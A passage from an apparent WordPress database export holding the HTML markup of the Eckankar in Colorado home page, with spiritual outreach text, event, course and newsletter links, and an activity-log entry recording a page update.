font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 8px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241346,41022,'post_id','7160'),(241347,41022,'post_type','page'),(241348,41022,'post_title','Home'),(241345,41021,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241344,41021,'_server_remote_addr','76.130.120.x'),(241342,41021,'_user_login','S8zhaBda'),(241343,41021,'_user_email','nada@zipnadanot.org'),(241341,41021,'_user_id','2'),(241340,41021,'_message_key','post_updated'),(241339,41021,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p 